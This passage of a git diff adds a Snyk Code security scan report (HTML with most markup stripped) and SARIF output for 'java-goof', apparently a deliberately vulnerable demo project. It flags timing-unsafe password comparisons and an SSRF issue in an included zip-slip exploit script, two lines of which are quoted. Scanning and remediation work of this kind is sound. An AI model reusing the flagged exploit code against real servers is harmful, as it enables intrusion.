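      fi
    fi
  fi
  echo 'Finished processing'
  # … unchanged: exit-code aggregation and per-project report …
done
```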
+
+
+ + + Snyk - Snyk Code + + + + + + + + + + + + + + + +
+

February 26th 2024, 2:54:11 pm (UTC+00:00)

+
Source: /Users/austindoll/Documents/GitHub/java-goof
+
+
+
+ +
+
+
+

Snyk Code Report

+ +
+
+ 0 high issues +
+
+ 3 medium issues +
+
+ 0 low issues +
+
+
+
+ Scan Coverage +
    +
  • HTML files: 10
  • Python files: 2
  • JavaScript files: 6
  • Java Server Pages files: 12
  • Java files: 36
  • XML files: 14
  • +
+
+
+
+
+
+
+
+

Unprotected Storage of Credentials

+
+ Data Flow + Fix Analysis +
+
+
    +
  • SNYK-CODE
  • +
  • CWE-256
  • +
+
+
+
+

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

+
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 250)
+
+
+

Data Flow

+
todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java
+
+ 250:17 +
return !
changePasswordForm.getNewPassword().equals(changePasswordForm.getConfirmationPassword());
+ SourceSink + 0 +
+
+
+

Fix Analysis

+

Details

+

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

+

Best practices for prevention

+
    +
  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
  • +
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
  • +
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
  • +
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
  • +
+
+
+
+
+
+
+
+
+

Unprotected Storage of Credentials

+
+ Data Flow + Fix Analysis +
+
+
    +
  • SNYK-CODE
  • +
  • CWE-256
  • +
+
+
+
+

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

+
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 254)
+
+
+

Data Flow

+ +
+ 254:17 +
return !
changePasswordForm.getCurrentPassword().equals(user.getPassword());
+ SourceSink + 0 +
+
+
+

Fix Analysis

+

Details

+

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

+

Best practices for prevention

+
    +
  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
  • +
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
  • +
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
  • +
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
  • +
+
+
+
+
+
+
+
+
+

Server-Side Request Forgery (SSRF)

+
+ Data Flow + Fix Analysis +
+
+
    +
  • SNYK-CODE
  • +
  • CWE-918
  • +
+
+
+
+

Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.

+
Found in: todolist-goof/exploits/zip-slip.py (line : 13)
+
+
+

Data Flow

+
todolist-goof/exploits/zip-slip.py
+
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ Source + 0 +
+ +
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 1 +
+ +
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 2 +
+ +
+ 10:8 +
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 3 +
+ +
+ 10:7 +
url =
(sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 4 +
+ +
+ 10:1 +

url = (sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+ + 5 +
+ +
+ 13:15 +
requests.post(
url, files=files)
+ + 6 +
+ +
+ 13:1 +

requests.post(url, files=files)
+ Sink + 7 +
+
+
+

Fix Analysis

+

Details

+

In a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.

+

Best practices for prevention

+
    +
  • Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.
  • +
  • Use authentication even within your own network to prevent exploitation of server-side requests.
  • +
  • Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.
  • +
  • Ideally, avoid sending server requests based on user-provided data altogether.
  • +
  • Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.
  • +
  • Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as file://, dict://, ftp://, and gopher://.
  • +
+
+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/snyk.yaml b/snyk.yaml new file mode 100644 index 0000000000..be61b78ae6 --- /dev/null +++ b/snyk.yaml @@ -0,0 +1,5 @@ +version: 2 +customFilters: + filter: ".vulnerabilities |= map(if .type == \"license\" and .title == \"LGPL-2.0 license\" then empty else . end)" + pass: "[.vulnerabilities[] | select(.type != \"license\")] | length" + msg: "Vulnerabilities found" diff --git a/test-command.json b/test-command.json new file mode 100644 index 0000000000..6d4c11ff6e --- /dev/null +++ b/test-command.json 
@@ -0,0 +1,1421 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "SnykCode", + "semanticVersion": "1.0.0", + "version": "1.0.0", + "rules": [ + { + "id": "python/Ssrf", + "name": "Ssrf", + "shortDescription": { + "text": "Server-Side Request Forgery (SSRF)" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. 
Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", + "text": "" + }, + "properties": { + "tags": [ + "python", + "Ssrf", + "Security", + "SourceNonServer", + "SourceLocalEnv", + "SourceCLI", + "Taint" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", + "lines": [ + { + "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", + "lineNumber": 31, + "lineChange": "removed" + }, + { + "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", + "lineNumber": 32, + "lineChange": "removed" + }, + { + "line": " args = parser.parse_args()\n", + "lineNumber": 33, + "lineChange": "removed" + }, + { + "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", + "lineNumber": 31, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " request = requests.get(args.zip_url, stream=True)\n", + "lineNumber": 36, + "lineChange": "removed" + }, + { + "line": " request = requests.get(url, stream=True)\n", + "lineNumber": 34, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", + "lines": [ + { + "line": "def get_magnet_link(movie_name = 'harry potter'):\n", + "lineNumber": 32, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 33, + 
"lineChange": "added" + }, + { + "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", + "lineNumber": 34, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "def get_torrent_url(search_url):\n", + "lineNumber": 40, + "lineChange": "removed" + }, + { + "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", + "lineNumber": 41, + "lineChange": "removed" + }, + { + "line": " search_request_response = requests.get(search_url, verify=False)\n", + "lineNumber": 42, + "lineChange": "removed" + }, + { + "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", + "lineNumber": 44, + "lineChange": "removed" + }, + { + "line": " resp = requests.get(URL)\n", + "lineNumber": 36, + "lineChange": "added" + }, + { + "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", + "lineNumber": 37, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", + "lines": [ + { + "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 23, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 24, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 25, + "lineChange": "removed" + }, + { + "line": "from htk.utils import htk_setting\n", + "lineNumber": 23, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 24, + 
"lineChange": "added" + }, + { + "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", + "lineNumber": 25, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 26, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 27, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 28, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": "class Usage(Exception):\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " def __init__(self, msg):\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " self.msg = msg\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": "def main(argv = None):\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " OPT_STR = 'hgr'\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " OPT_LIST = [\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " 'help',\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " 'geocode',\n", + "lineNumber": 38, + "lineChange": "none" + }, + { + "line": " 'resolve',\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": " ]\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " if argv is None:\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " argv = sys.argv\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 44, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 
45, + "lineChange": "none" + }, + { + "line": " progname = argv[0]\n", + "lineNumber": 46, + "lineChange": "none" + }, + { + "line": " opts, args = getopt.getopt(argv[1:],\n", + "lineNumber": 47, + "lineChange": "none" + }, + { + "line": " OPT_STR,\n", + "lineNumber": 48, + "lineChange": "none" + }, + { + "line": " OPT_LIST)\n", + "lineNumber": 49, + "lineChange": "none" + }, + { + "line": " except getopt.error, msg:\n", + "lineNumber": 50, + "lineChange": "none" + }, + { + "line": " raise Usage(msg)\n", + "lineNumber": 51, + "lineChange": "none" + }, + { + "line": " # process options\n", + "lineNumber": 52, + "lineChange": "none" + }, + { + "line": " for o, a in opts:\n", + "lineNumber": 53, + "lineChange": "none" + }, + { + "line": " if o in ('-h', '--help'):\n", + "lineNumber": 54, + "lineChange": "none" + }, + { + "line": " print __doc__\n", + "lineNumber": 55, + "lineChange": "none" + }, + { + "line": " sys.exit(0)\n", + "lineNumber": 56, + "lineChange": "none" + }, + { + "line": " elif o in ('-g', '--geocode'):\n", + "lineNumber": 57, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 58, + "lineChange": "none" + }, + { + "line": " elif o in ('-r', '--resolve'):\n", + "lineNumber": 59, + "lineChange": "none" + }, + { + "line": " is_geocode = False\n", + "lineNumber": 60, + "lineChange": "none" + }, + { + "line": " if is_geocode and len(args) == 1:\n", + "lineNumber": 61, + "lineChange": "none" + }, + { + "line": " address = args[0]\n", + "lineNumber": 62, + "lineChange": "none" + }, + { + "line": " latitude, longitude = get_latlng(address)\n", + "lineNumber": 63, + "lineChange": "none" + }, + { + "line": " print '%s,%s' % (latitude, longitude,)\n", + "lineNumber": 64, + "lineChange": "none" + }, + { + "line": " elif not is_geocode and len(args) == 2:\n", + "lineNumber": 65, + "lineChange": "none" + }, + { + "line": " latitude = args[0]\n", + "lineNumber": 66, + "lineChange": "none" + }, + { + "line": " longitude = args[1]\n", + 
"lineNumber": 67, + "lineChange": "none" + }, + { + "line": " address = reverse_geocode(latitude, longitude)\n", + "lineNumber": 68, + "lineChange": "none" + }, + { + "line": " print address\n", + "lineNumber": 69, + "lineChange": "none" + }, + { + "line": " else:\n", + "lineNumber": 70, + "lineChange": "none" + }, + { + "line": " raise Usage('Incorrect arguments')\n", + "lineNumber": 71, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 72, + "lineChange": "none" + }, + { + "line": " except Usage, err:\n", + "lineNumber": 73, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, err.msg\n", + "lineNumber": 74, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, \"for help use --help\"\n", + "lineNumber": 75, + "lineChange": "none" + }, + { + "line": " return 3.14159\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": "def get_latlng(address):\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " address_query = urllib.quote(address, '')\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": " values = {\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " 'format' : 'json',\n", + "lineNumber": 79, + "lineChange": "none" + }, + { + "line": "'sensor' : 'false',\n", + "lineNumber": 80, + "lineChange": "none" + }, + { + "line": "'address' : address_query,\n", + "lineNumber": 81, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 82, + "lineChange": "none" + }, + { + "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", + "lineNumber": 83, + "lineChange": "removed" + }, + { + "line": " response = requests.get(url)\n", + "lineNumber": 84, + "lineChange": "removed" + }, + { + "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", + "lineNumber": 83, + "lineChange": "added" + }, + { + "line": " if key:\n", + 
"lineNumber": 84, + "lineChange": "added" + }, + { + "line": " params['key'] = key\n", + "lineNumber": 85, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 86, + "lineChange": "added" + }, + { + "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", + "lineNumber": 87, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 4, + "cwe": [ + "CWE-918" + ] + } + }, + { + "id": "java/ReturnsPassword", + "name": "ReturnsPassword", + "shortDescription": { + "text": "Unprotected Storage of Credentials" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "## Details\n\nIf credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. 
If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.\n\n## Best practices for prevention\n* Ensure that passwords are never stored in plain text, even for \"purely internal\" use.\n* Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.\n* Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.\n* To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.", + "text": "" + }, + "properties": { + "tags": [ + "java", + "ReturnsPassword", + "Security" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-5a57acf4efafddf23331cc9f3c8d724e1cdd01633f61aa2d4e680b9b5241ff71L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class BusinessAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Lecturer user;\n", + "lineNumber": 15, + 
"lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": " return BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-52010d754aef2fbde5a21bb6e6002096c329060b69306e842cd24a31129752b1L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": 
"@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class ConsumerAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Student student;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": "\t\treturn BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/SeraphJACK/SimpleLogin/commit/ff6715f90b9a3e00f7201618ff2f4986c5ebc0f5?diff=split#diff-c79ff75898e7300d5901fce735e57a03db459d401284e7c67ec4711d5adebba4L-1", + "lines": [ + { 
+ "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 4, + "lineChange": "added" + }, + { + "line": "import top.seraphjack.simplelogin.SLConfig;\n", + "lineNumber": 5, + "lineChange": "none" + }, + { + "line": "import top.seraphjack.simplelogin.SimpleLogin;\n", + "lineNumber": 6, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "import javax.annotation.concurrent.NotThreadSafe;\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": "import java.io.IOException;\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": "import java.nio.charset.StandardCharsets;\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Files;\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Path;\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "import java.nio.file.StandardOpenOption;\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "import java.util.Arrays;\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "import java.util.HashMap;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "import java.util.Map;\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "@NotThreadSafe\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "public class StorageProviderFile implements StorageProvider {\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": " private Gson gson;\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": " private Path path;\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": " private Map entries;\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": " private boolean dirty = false;\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + 
"line": " StorageProviderFile(Path path) throws IOException {\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": " this.path = path;\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": " this.gson = new Gson();\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": " if (Files.exists(path)) {\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " } else {\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": " if (!Files.exists(path.getParent())) {\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": " Files.createDirectories(path.getParent());\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " Files.createFile(path);\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 38, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " @Override\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " public boolean checkPassword(String username, String password) {\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " if (entries.containsKey(username)) {\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " return entries.get(username).password.equals(password);\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " return 
BCrypt.checkpw(password, entries.get(username).password);\n", + "lineNumber": 44, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 2, + "cwe": [ + "CWE-256" + ] + } + } + ] + } + }, + "results": [ + { + "ruleId": "python/Ssrf", + "ruleIndex": 0, + "level": "warning", + "message": { + "text": "Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", + "markdown": "Unsanitized input from {0} {1} into {2}, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", + "arguments": [ + "[a command line argument](0)", + "[flows](1),(2),(3),(4),(5),(6)", + "[requests.post](7)" + ] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 13, + "endLine": 13, + "startColumn": 1, + "endColumn": 14 + } + } + } + ], + "fingerprints": { + "0": "c91d074435910f1a76d8677462395e7a7f5317f554c886317059bf72f98d247f", + "1": "3d071b71.889edeb6.ef7ad415.3456c081.056de048.ba14daf2.081ac3f4.8794408a.a6b41d6e.889edeb6.ef7ad415.edcf1db9.c8b7d5cc.48e1de78.a2237efa.f46ed94e" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 16 + } + } + } + }, + { + "location": { + "id": 1, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/exploits/zip-slip.py", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 10, + "endLine": 10, + "startColumn": 8, + "endColumn": 16 + } + } + } + }, + { + "location": { + "id": 